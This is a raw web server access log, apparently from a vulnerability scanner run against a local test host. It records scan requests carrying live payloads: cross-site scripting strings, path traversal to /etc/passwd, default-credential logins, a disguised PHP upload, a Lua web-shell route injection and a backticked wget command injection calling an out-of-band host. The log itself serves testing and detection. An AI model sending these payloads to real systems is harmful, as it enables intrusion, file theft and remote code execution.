\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.189","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"https://example.com", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\x22>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/../vpns/cfg/smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/emq.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x22297MTqpsgIW2UCq7QoD8jhUInDU.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /messages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_caps/webCapsConfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /checker/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://c9v8h88smpv8c1ig07h06wz1xcmqdnko9.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.do?file=../../../../config.text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php/'%3E%3Csvg/onload=alert%60297MU224sbk0fyVrRPa1VsIysaO%60%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/tmindex.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/login/LoginForm.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/authentication_page.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/297MTp6fZrs7T5aqkVePqRQeDvQ\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/portalhelp/en/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fc9v8h88smpv8c1ig07h0c7zgzi45gk6zc.oast.fun%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_shell_cmd.gch HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login.html 